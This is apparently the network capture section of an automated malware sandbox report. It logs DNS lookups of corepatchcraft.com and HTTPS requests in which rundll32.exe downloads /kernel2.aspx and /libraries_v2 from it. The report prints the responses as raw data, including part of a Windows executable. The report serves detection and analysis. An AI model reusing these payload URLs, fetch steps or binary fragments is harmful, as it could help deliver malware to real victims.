                        Jan 16, 2025 06:04:04.765465975 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.765495062 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.765512943 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.765851021 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.765878916 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.765921116 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.765933990 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.765966892 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.765989065 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.766731024 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.766760111 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.766819000 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.766832113 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.766859055 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.766887903 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.767132044 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.767163038 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.767200947 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.767214060 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.767239094 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.767270088 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.798665047 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.798698902 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.798751116 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.798763990 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.798798084 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.798824072 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.811057091 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.811086893 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.811137915 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.811156034 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.811193943 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.811217070 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.811525106 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.811554909 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.811592102 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.811605930 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.811638117 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.811655045 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.821578979 CET4436447594.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.821655989 CET64475443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.821671009 CET4436447594.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.821729898 CET64475443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.851825953 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.851861954 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.851917982 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.851932049 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.851972103 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.851993084 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.852145910 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.852180958 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.852221012 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.852233887 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.852258921 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.852288008 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.852288008 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.852348089 CET64474443192.168.2.694.159.113.213

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Jan 16, 2025 06:01:58.374888897 CET5702553192.168.2.61.1.1.1
                        Jan 16, 2025 06:01:59.237261057 CET53570251.1.1.1192.168.2.6
                        Jan 16, 2025 06:02:15.643115997 CET53493691.1.1.1192.168.2.6
                        Jan 16, 2025 06:02:30.142590046 CET5359796162.159.36.2192.168.2.6
                        Jan 16, 2025 06:02:30.630842924 CET5137653192.168.2.61.1.1.1
                        Jan 16, 2025 06:02:30.638219118 CET53513761.1.1.1192.168.2.6
                        Jan 16, 2025 06:03:01.654944897 CET5808953192.168.2.61.1.1.1
                        Jan 16, 2025 06:03:02.537010908 CET53580891.1.1.1192.168.2.6

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Jan 16, 2025 06:01:58.374888897 CET192.168.2.61.1.1.10x18eeStandard query (0)corepatchcraft.comA (IP address)IN (0x0001)false
                        Jan 16, 2025 06:02:30.630842924 CET192.168.2.61.1.1.10x27a8Standard query (0)171.39.242.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                        Jan 16, 2025 06:03:01.654944897 CET192.168.2.61.1.1.10xcb03Standard query (0)corepatchcraft.comA (IP address)IN (0x0001)false

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Jan 16, 2025 06:01:59.237261057 CET1.1.1.1192.168.2.60x18eeNo error (0)corepatchcraft.com94.159.113.213A (IP address)IN (0x0001)false
                        Jan 16, 2025 06:02:30.638219118 CET1.1.1.1192.168.2.60x27a8Name error (3)171.39.242.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                        Jan 16, 2025 06:03:02.537010908 CET1.1.1.1192.168.2.60xcb03No error (0)corepatchcraft.com94.159.113.213A (IP address)IN (0x0001)false

                        HTTP Request Dependency Graph

                        • corepatchcraft.com

                        HTTPS Proxied Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.64971094.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:02:00 UTC81OUTGET /kernel2.aspx HTTP/1.1
                        Host: corepatchcraft.com
                        Cache-Control: no-cache
                        2025-01-16 05:02:00 UTC252INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:00 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        Last-Modified: Fri, 10 Jan 2025 13:04:21 GMT
                        ETag: "d0d40-62b59bbb4c5fe"
                        Accept-Ranges: bytes
                        Content-Length: 855360
                        Connection: close
                        2025-01-16 05:02:00 UTC7940INData Raw: 41 51 50 36 54 55 74 4f 63 55 78 64 61 6b 31 49 73 59 35 4d 57 64 4a 4e 53 45 35 78 54 46 6c 71 44 55 68 4f 63 55 78 5a 61 6b 31 49 54 6e 46 4d 57 57 70 4e 53 45 35 78 54 46 6c 71 54 55 68 4f 0d 0a 63 55 78 5a 61 6b 31 49 54 6e 46 4d 57 57 70 4e 57 45 39 78 54 46 64 31 39 30 5a 4f 78 55 57 55 53 2f 56 4a 41 72 78 74 44 51 49 6b 4f 32 34 42 50 6a 59 4e 50 79 6b 6a 55 53 38 34 42 43 4d 6e 0d 0a 4f 6c 45 75 50 45 6f 2f 50 53 42 52 4a 54 64 4b 43 51 63 64 55 53 45 32 44 69 68 6d 51 33 78 47 66 57 70 4e 53 45 35 78 54 46 6d 6a 68 65 78 48 2f 4f 57 54 4d 4d 44 68 68 43 76 42 38 4b 41 58 0d 0a 46 70 57 34 46 39 2f 44 68 78 49 51 71 6f 4d 43 52 75 53 43 46 50 70 6b 6c 7a 48 51 34 59 51 72 78 33 47 6a 46 74 44 6e 75 78 59 48 73 59 4d 54 31 64 69 47 41 2b 46 6c 68
                        Data Ascii: AQP6TUtOcUxdak1IsY5MWdJNSE5xTFlqDUhOcUxZak1ITnFMWWpNSE5xTFlqTUhOcUxZak1ITnFMWWpNWE9xTFd190ZOxUWUS/VJArxtDQIkO24BPjYNPykjUS84BCMnOlEuPEo/PSBRJTdKCQcdUSE2DihmQ3xGfWpNSE5xTFmjhexH/OWTMMDhhCvB8KAXFpW4F9/DhxIQqoMCRuSCFPpklzHQ4YQrx3GjFtDnuxYHsYMT1diGA+Flh
                        2025-01-16 05:02:00 UTC16384INData Raw: 7a 35 31 6d 78 67 57 79 6d 61 71 71 61 45 33 44 43 34 33 48 76 44 65 50 54 45 36 39 67 4a 57 6d 67 59 53 43 76 59 43 56 70 6f 47 45 0d 0a 47 2f 71 67 32 6f 5a 6c 77 51 4f 4e 66 35 6e 68 41 4c 54 48 63 4d 55 59 62 73 51 4a 52 76 6f 5a 70 61 30 50 54 45 39 78 54 46 6e 68 43 4c 53 4a 4d 55 52 59 61 6b 31 49 78 54 79 77 6e 6d 73 4a 0d 0a 4c 45 5a 68 78 77 78 6d 78 42 32 6d 2b 67 6c 52 34 77 69 73 78 54 79 77 32 71 74 42 77 51 4f 64 78 77 79 47 78 42 32 32 2b 67 6d 78 34 77 69 6f 78 54 79 6f 30 43 65 52 77 78 75 52 78 31 76 6a 0d 0a 43 4a 44 46 50 4a 44 53 65 38 51 64 75 76 6f 4a 6f 61 31 4e 4c 41 68 35 58 4e 49 6e 74 59 39 50 75 51 70 52 65 73 59 64 74 76 6f 4a 72 65 4d 50 54 4d 30 4d 75 46 6b 66 52 49 38 4c 67 55 78 5a 0d 0a 61 6b 32 6a 52 2f 6f 42 72 57 6b
                        Data Ascii: z51mxgWymaqqaE3DC43HvDePTE69gJWmgYSCvYCVpoGEG/qg2oZlwQONf5nhALTHcMUYbsQJRvoZpa0PTE9xTFnhCLSJMURYak1IxTywnmsJLEZhxwxmxB2m+glR4wisxTyw2qtBwQOdxwyGxB22+gmx4wioxTyo0CeRwxuRx1vjCJDFPJDSe8QduvoJoa1NLAh5XNIntY9PuQpResYdtvoJreMPTM0MuFkfRI8LgUxZak2jR/oBrWk
                        2025-01-16 05:02:00 UTC16384INData Raw: 70 6f 47 45 67 72 30 5a 30 6f 59 6e 74 79 59 52 72 56 35 36 4b 65 6c 4f 63 55 78 5a 0d 0a 4f 69 6e 42 61 33 46 4d 57 57 6f 63 79 36 4a 74 48 77 38 39 78 43 32 2b 2b 41 47 78 34 51 69 67 78 7a 53 51 30 69 65 52 77 51 4f 52 78 77 79 4b 78 6b 72 48 4e 4b 6a 53 4a 30 56 48 38 43 42 42 0d 0a 33 4c 68 43 7a 66 39 78 54 46 6e 68 43 45 44 4e 73 56 77 4a 34 51 43 67 70 6b 69 2f 70 70 58 45 44 61 4c 36 41 62 58 68 47 45 54 48 49 45 6a 53 4c 36 48 44 41 33 6e 47 43 47 62 46 47 45 4c 36 0d 0a 43 62 31 6c 38 77 42 44 39 49 55 74 62 4d 59 64 6f 76 67 5a 76 61 30 49 74 45 35 78 54 46 6e 68 43 4b 51 65 2b 67 46 52 34 56 77 61 78 54 79 6b 73 51 32 79 74 37 48 34 43 59 48 68 43 4b 54 46 0d 0a 50 4a 54 51 59 73 59 64 6f 69 50 48 48 47 4c 47 41 45 59 67 78 78 53 43 70 51 47
                        Data Ascii: poGEgr0Z0oYntyYRrV56KelOcUxZOinBa3FMWWocy6JtHw89xC2++AGx4QigxzSQ0ieRwQORxwyKxkrHNKjSJ0VH8CBB3LhCzf9xTFnhCEDNsVwJ4QCgpki/ppXEDaL6AbXhGETHIEjSL6HDA3nGCGbFGEL6Cb1l8wBD9IUtbMYdovgZva0ItE5xTFnhCKQe+gFR4VwaxTyksQ2yt7H4CYHhCKTFPJTQYsYdoiPHHGLGAEYgxxSCpQG
                        2025-01-16 05:02:00 UTC16384INData Raw: 74 37 46 43 6a 4a 69 4b 54 55 76 4c 0d 0a 76 62 4b 6d 6c 63 54 4e 68 6f 2b 7a 70 75 45 41 75 4d 63 38 2f 4e 4c 2f 68 62 61 78 6a 73 55 4d 78 73 59 4e 51 76 6f 42 53 65 50 49 61 4c 47 4f 73 39 44 6e 61 62 65 78 6a 71 64 4c 34 52 6a 34 0d 0a 7a 5a 74 4e 30 44 2f 39 77 77 76 64 7a 35 6c 72 78 41 33 69 38 6a 48 70 61 6a 74 6f 77 2f 78 73 70 70 57 79 77 63 4f 31 73 71 61 56 78 68 33 69 66 76 70 62 4f 73 62 46 69 6f 2b 7a 70 6f 4b 77 0d 0a 57 30 39 78 70 35 48 68 77 47 69 78 6a 72 50 53 2f 32 6d 33 73 59 37 46 31 44 4b 7a 74 37 48 34 32 51 57 55 73 72 66 46 39 42 53 6e 6c 62 4c 44 77 79 32 79 70 70 58 45 44 55 4c 34 41 55 6d 44 0d 0a 7a 55 70 4f 63 63 30 6b 77 6b 31 4a 54 6e 46 44 33 42 4a 4d 53 45 37 38 32 58 6d 55 73 72 66 48 4a 4f 6a 53 4c 2b 6e 42 79 7a 47
                        Data Ascii: t7FCjJiKTUvLvbKmlcTNho+zpuEAuMc8/NL/hbaxjsUMxsYNQvoBSePIaLGOs9DnabexjqdL4Rj4zZtN0D/9wwvdz5lrxA3i8jHpajtow/xsppWywcO1sqaVxh3ifvpbOsbFio+zpoKwW09xp5HhwGixjrPS/2m3sY7F1DKzt7H42QWUsrfF9BSnlbLDwy2yppXEDUL4AUmDzUpOcc0kwk1JTnFD3BJMSE782XmUsrfHJOjSL+nByzG
                        2025-01-16 05:02:00 UTC16384INData Raw: 31 47 2b 42 6d 4a 34 51 6a 38 78 7a 53 59 30 69 65 5a 77 51 4f 35 78 77 79 36 78 42 32 43 2b 67 6d 56 4f 73 59 46 68 70 6d 77 38 47 70 4e 49 6b 37 38 41 65 6b 37 70 55 6e 45 6a 72 50 61 0d 0a 72 6b 56 48 2b 4b 48 4a 69 78 39 61 49 46 68 4e 54 46 6b 43 6e 51 35 47 59 53 52 42 4e 30 56 59 70 69 46 50 58 32 72 4f 6a 45 4b 32 43 5a 31 71 54 55 68 4f 2f 41 48 74 34 77 43 67 78 53 53 6b 0d 0a 30 6d 6a 45 44 59 37 36 41 62 48 68 47 49 7a 48 59 4d 63 63 71 73 51 4e 38 76 6f 42 35 65 4d 41 38 49 6b 30 73 4b 61 56 73 72 66 44 50 50 79 78 63 70 46 49 54 76 6f 4a 34 65 45 41 76 43 72 34 0d 0a 51 56 6c 71 54 55 6a 46 6c 42 47 61 70 6f 47 45 67 72 32 41 6c 54 2f 47 70 4d 32 64 43 4e 51 76 73 73 45 4c 67 53 5a 59 35 77 43 33 48 35 6d 46 4f 47 68 4e 79 34 70 35 78 52 79
                        Data Ascii: 1G+BmJ4Qj8xzSY0ieZwQO5xwy6xB2C+gmVOsYFhpmw8GpNIk78Aek7pUnEjrParkVH+KHJix9aIFhNTFkCnQ5GYSRBN0VYpiFPX2rOjEK2CZ1qTUhO/AHt4wCgxSSk0mjEDY76AbHhGIzHYMccqsQN8voB5eMA8Ik0sKaVsrfDPPyxcpFITvoJ4eEAvCr4QVlqTUjFlBGapoGEgr2AlT/GpM2dCNQvssELgSZY5wC3H5mFOGhNy4p5xRy
                        2025-01-16 05:02:01 UTC16384INData Raw: 58 46 48 4f 4c 30 54 45 35 78 54 44 4b 37 73 73 4d 4c 2b 55 38 4a 62 73 51 64 79 76 6f 42 33 65 46 63 77 52 76 78 78 78 7a 71 7a 58 42 50 0d 0a 42 45 57 65 4c 35 46 4a 54 6e 46 4d 73 6d 32 4b 44 5a 4a 78 54 46 6c 71 78 77 57 53 2b 51 47 75 5a 66 73 64 75 66 53 65 4c 48 30 6c 51 56 78 78 54 44 47 36 43 30 42 65 47 65 41 36 59 6c 32 67 0d 0a 39 36 56 4a 57 65 6d 4a 52 4d 55 38 73 4e 6f 54 58 55 67 37 5a 69 52 54 65 45 31 49 4a 71 45 4b 55 58 6f 6c 6f 43 31 35 58 4c 48 7a 6d 55 31 4f 38 6f 68 56 34 51 68 41 78 2f 51 77 70 70 57 79 0d 0a 79 36 4a 68 78 35 58 6a 36 44 69 78 6a 72 50 53 2f 7a 47 33 73 59 34 65 73 59 4d 4a 74 37 48 36 43 61 58 68 42 56 69 6d 6e 2f 68 5a 61 73 59 46 73 76 6f 4e 53 65 47 6f 46 59 78 31 54 4a 57 6d 0d 0a 47 4d 4f 69 47 37 4d 78 78
                        Data Ascii: XFHOL0TE5xTDK7ssML+U8JbsQdyvoB3eFcwRvxxxzqzXBPBEWeL5FJTnFMsm2KDZJxTFlqxwWS+QGuZfsdufSeLH0lQVxxTDG6C0BeGeA6Yl2g96VJWemJRMU8sNoTXUg7ZiRTeE1IJqEKUXoloC15XLHzmU1O8ohV4QhAx/QwppWyy6Jhx5Xj6DixjrPS/zG3sY4esYMJt7H6CaXhBVimn/hZasYFsvoNSeGoFYx1TJWmGMOiG7Mxx
                        2025-01-16 05:02:01 UTC16384INData Raw: 41 36 53 59 38 4c 6a 62 4f 6d 6c 62 4c 46 41 37 6d 6b 66 47 46 50 53 45 48 48 43 5a 45 36 0d 0a 77 41 57 65 6d 58 51 63 61 45 33 44 43 33 6d 6c 51 6d 68 4e 53 4d 55 38 76 4e 71 72 53 63 48 44 67 62 4b 6d 6c 66 64 4d 54 6e 46 4d 4d 71 69 79 77 38 4f 42 73 71 61 56 54 67 6c 4b 2b 4d 6d 31 0d 0a 6c 4c 4b 33 78 65 53 67 70 35 57 79 77 30 7a 34 79 62 47 55 73 72 66 46 2f 4b 53 6e 6c 62 4c 49 64 33 41 35 55 4b 30 49 36 45 39 78 54 46 6d 42 53 6f 38 4c 30 55 78 5a 61 6b 33 43 47 39 48 45 0d 0a 44 4c 56 43 2f 67 75 75 79 5a 6b 66 57 69 42 70 59 6b 78 5a 41 70 30 4f 52 6d 45 6b 39 51 6c 46 57 4b 61 65 36 56 78 71 7a 6f 78 43 2b 68 6d 70 36 54 64 6b 54 67 52 46 6e 69 2f 52 53 55 35 78 0d 0a 54 4c 4a 74 69 67 33 53 63 55 78 5a 61 73 63 4e 30 76 6b 4a 68 32 58 37 42
                        Data Ascii: A6SY8LjbOmlbLFA7mkfGFPSEHHCZE6wAWemXQcaE3DC3mlQmhNSMU8vNqrScHDgbKmlfdMTnFMMqiyw8OBsqaVTglK+Mm1lLK3xeSgp5Wyw0z4ybGUsrfF/KSnlbLId3A5UK0I6E9xTFmBSo8L0UxZak3CG9HEDLVC/guuyZkfWiBpYkxZAp0ORmEk9QlFWKae6VxqzoxC+hmp6TdkTgRFni/RSU5xTLJtig3ScUxZascN0vkJh2X7B
                        2025-01-16 05:02:01 UTC16384INData Raw: 4b 33 39 48 42 4d 57 57 72 49 6d 6a 74 71 0d 0a 69 68 79 6f 54 59 38 4c 6a 62 4f 6d 6c 62 4c 46 41 36 32 6b 31 4b 4e 4d 53 4d 51 30 6a 72 41 7a 51 45 68 4f 6d 43 31 64 61 6b 33 44 43 34 48 50 6d 54 49 64 77 77 4e 35 70 4c 6a 41 73 72 66 33 0d 0a 63 45 78 5a 61 73 69 42 4f 32 71 4b 48 4b 74 4e 6a 77 75 4e 73 36 61 56 73 73 55 44 72 61 51 4d 6f 30 78 49 78 44 53 4e 73 45 74 41 53 45 36 59 5a 56 31 71 54 63 4d 62 67 63 66 62 36 6b 31 49 0d 0a 54 76 72 47 33 57 70 4e 53 4d 66 30 4d 4b 53 56 73 73 48 44 38 62 47 6d 6c 63 62 64 4d 6f 79 7a 70 75 48 49 79 4c 4f 4f 73 39 44 2f 4c 62 57 78 6a 73 58 63 44 72 43 33 73 66 7a 42 4f 5a 65 79 0d 0a 74 78 2f 36 41 56 47 43 69 2f 61 78 6a 76 5a 59 61 6b 31 49 79 36 4d 35 51 71 77 49 69 45 36 32 43 61 57 56 73 72 65 78 2f
                        Data Ascii: K39HBMWWrImjtqihyoTY8LjbOmlbLFA62k1KNMSMQ0jrAzQEhOmC1dak3DC4HPmTIdwwN5pLjAsrf3cExZasiBO2qKHKtNjwuNs6aVssUDraQMo0xIxDSNsEtASE6YZV1qTcMbgcfb6k1ITvrG3WpNSMf0MKSVssHD8bGmlcbdMoyzpuHIyLOOs9D/LbWxjsXcDrC3sfzBOZeytx/6AVGCi/axjvZYak1Iy6M5QqwIiE62CaWVsrex/
                        2025-01-16 05:02:01 UTC16384INData Raw: 42 61 72 36 47 62 32 74 54 30 68 4f 63 55 7a 53 4c 36 6d 50 44 6e 56 4d 57 57 70 4e 77 77 4f 56 69 78 68 69 54 55 68 4f 63 59 6f 63 6c 6b 7a 44 47 35 6e 50 6d 33 72 45 48 5a 4c 36 43 59 58 6a 0d 0a 43 49 7a 44 50 4c 34 49 5a 66 73 64 76 79 50 48 46 4b 36 6c 4e 66 47 50 73 39 49 76 6b 59 38 4f 66 55 78 5a 61 6b 32 4f 43 34 31 4f 30 69 65 6c 79 34 39 52 78 52 53 79 78 68 32 57 2b 42 6d 5a 0d 0a 35 77 69 34 48 6e 37 36 46 49 55 63 77 77 4f 78 70 42 62 56 73 37 66 46 4a 4a 53 65 4b 45 46 49 54 6e 46 4d 6e 79 2b 78 53 38 55 30 70 4a 34 71 66 55 68 4f 63 55 7a 53 4a 36 57 4f 44 30 56 4d 0d 0a 30 6a 2b 6c 79 34 78 4a 78 51 79 2b 39 55 78 4f 63 55 77 79 6f 6b 54 44 47 36 57 4c 58 57 42 4e 53 45 35 78 69 68 79 57 53 63 55 4c 66 52 7a 53 4a 35 6d 67 4f 2b 4a 4e 57
                        Data Ascii: Bar6Gb2tT0hOcUzSL6mPDnVMWWpNwwOVixhiTUhOcYoclkzDG5nPm3rEHZL6CYXjCIzDPL4IZfsdvyPHFK6lNfGPs9IvkY8OfUxZak2OC41O0iely49RxRSyxh2W+BmZ5wi4Hn76FIUcwwOxpBbVs7fFJJSeKEFITnFMny+xS8U0pJ4qfUhOcUzSJ6WOD0VM0j+ly4xJxQy+9UxOcUwyokTDG6WLXWBNSE5xihyWScULfRzSJ5mgO+JNW
                        2025-01-16 05:02:01 UTC16384INData Raw: 6d 58 67 62 62 6b 32 50 43 34 32 7a 70 70 57 79 78 51 50 4e 70 43 6b 45 54 45 6a 46 4e 4b 44 61 55 6b 30 39 57 52 6d 6a 66 47 70 4e 49 4a 34 33 0d 0a 52 45 6b 43 34 52 78 47 59 61 54 6f 63 45 68 49 7a 62 56 41 30 6a 2b 68 77 30 7a 37 52 4e 45 6e 70 63 67 7a 6d 55 30 74 59 73 30 31 70 6e 4d 34 63 6f 45 66 77 78 75 64 78 78 78 69 78 67 4a 4b 0d 0a 53 67 52 64 48 30 53 50 43 35 56 4e 57 57 70 4e 6f 30 6d 32 43 62 31 71 54 55 68 4f 2b 78 6d 39 34 68 69 37 78 44 53 2f 73 6a 62 47 44 61 4c 36 41 56 48 68 48 55 42 31 49 45 51 73 59 34 6f 4e 0d 0a 72 6e 42 4d 57 57 71 6d 54 34 6b 30 72 46 6c 71 54 55 6a 45 4e 4b 7a 52 4c 37 2f 43 43 34 4f 6e 61 75 45 41 51 4d 55 67 51 4e 41 2f 6d 63 4d 4c 6e 63 63 52 5a 73 51 46 6c 76 6f 5a 67 56 45 59 0d 0a 6e 44 74 34 69 78 79
                        Data Ascii: mXgbbk2PC42zppWyxQPNpCkETEjFNKDaUk09WRmjfGpNIJ43REkC4RxGYaTocEhIzbVA0j+hw0z7RNEnpcgzmU0tYs01pnM4coEfwxudxxxixgJKSgRdH0SPC5VNWWpNo0m2Cb1qTUhO+xm94hi7xDS/sjbGDaL6AVHhHUB1IEQsY4oNrnBMWWqmT4k0rFlqTUjENKzRL7/CC4OnauEAQMUgQNA/mcMLnccRZsQFlvoZgVEYnDt4ixy


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        1192.168.2.64970994.159.113.2134436932C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:02:00 UTC81OUTGET /libraries_v2 HTTP/1.1
                        Host: corepatchcraft.com
                        Cache-Control: no-cache
                        2025-01-16 05:02:00 UTC252INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:00 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        Last-Modified: Fri, 10 Jan 2025 13:52:00 GMT
                        ETag: "44a00-62b5a661817dc"
                        Accept-Ranges: bytes
                        Content-Length: 281088
                        Connection: close
                        2025-01-16 05:02:00 UTC7940INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 89 36 3d 84 e8 58 6e 84 e8 58 6e 84 e8 58 6e 57 9a 5b 6f 8e e8 58 6e 57 9a 5d 6f 0c e8 58 6e 57 9a 5c 6f 90 e8 58 6e 82 69 5d 6f 9b e8 58 6e 82 69 5c 6f 94 e8 58 6e 82 69 5b 6f 90 e8 58 6e 57 9a 59 6f 8f e8 58 6e 84 e8 59 6e f8 e8 58 6e ee 69 5d 6f 86 e8 58 6e ee 69 58 6f 85 e8 58 6e ee 69 5a 6f 85 e8 58 6e 52 69 63 68 84 e8 58 6e 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04
                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$6=XnXnXnW[oXnW]oXnW\oXni]oXni\oXni[oXnWYoXnYnXni]oXniXoXniZoXnRichXnPEL
                        2025-01-16 05:02:00 UTC16384INData Raw: 45 e8 8b 4d a0 81 c1 95 03 00 00 89 8d ac fe ff ff ba 04 00 00 00 66 89 15 5c 11 04 10 0f be 45 ec 35 4e 1f 00 00 66 89 45 e4 0f b7 0d 5c 11 04 10 89 8d 78 ff ff ff 83 bd 78 ff ff ff 04 77 70 8b 95 78 ff ff ff ff 24 95 54 34 00 10 33 c0 c7 05 50 11 04 10 02 00 00 00 a3 54 11 04 10 eb 50 0f bf 45 d8 99 8b c8 2b 0d 30 11 04 10 0f bf 45 d8 99 03 c1 66 89 45 d8 0f b6 45 ed 99 2d f0 ad ce 99 a3 24 11 04 10 eb 27 eb 25 ba 8d 8b ff ff 66 89 55 e4 0f be 45 ee 99 05 9b 3b f7 d8 66 a3 5c 11 04 10 eb 0a a0 38 1c 04 10 a2 47 10 04 10 8b 4d a0 83 c1 42 89 8d 44 ff ff ff 68 04 01 00 00 8d 95 7c fd ff ff 52 ff 15 5c 30 03 10 89 45 84 8b 45 a0 05 c0 00 00 00 89 85 40 ff ff ff 0f bf 05 28 11 04 10 99 8b 0d 08 11 04 10 8b 15 0c 11 04 10 89 95 a8 fe ff ff 2b c1 66 a3 28 11
                        Data Ascii: EMf\E5NfE\xxwpx$T43PTPE+0EfEE-$'%fUE;f\8GMBDh|R\0EE@(+f(
                        2025-01-16 05:02:00 UTC16384INData Raw: bf 05 70 11 04 10 99 89 85 64 ff ff ff 89 95 68 ff ff ff 0f bf 15 70 11 04 10 89 95 04 ff ff ff 0f be 05 1f 10 04 10 99 89 45 d4 89 55 d8 c7 45 dc 09 13 c2 f9 b8 10 ca ff ff 66 89 45 94 a1 3c 11 04 10 99 89 85 44 ff ff ff 89 95 48 ff ff ff b9 da b5 0d 00 c7 45 f0 17 65 3c d5 89 4d f4 0f be 05 1f 10 04 10 99 89 85 24 ff ff ff 89 95 28 ff ff ff c7 85 7c ff ff ff 5b 1b 00 00 8b 15 80 11 04 10 89 55 cc 0f be 05 47 10 04 10 99 89 85 e8 fe ff ff 89 95 ec fe ff ff a1 3c 11 04 10 66 89 45 90 b9 aa c1 ff ff 66 89 4d 8c c6 45 eb 17 66 8b 15 00 11 04 10 66 89 55 88 66 a1 1c 11 04 10 66 89 45 84 b9 89 ec 06 00 c7 85 e0 fe ff ff a6 aa 51 66 89 8d e4 fe ff ff c7 85 00 ff ff ff e0 00 00 00 8b 15 24 11 04 10 89 95 20 ff ff ff 33 c0 c7 85 d8 fe ff ff 34 28 be aa 89 85 dc
                        Data Ascii: pdhpEUEfE<DHEe<M$(|[UG<fEfMEffUffEQf$ 34(
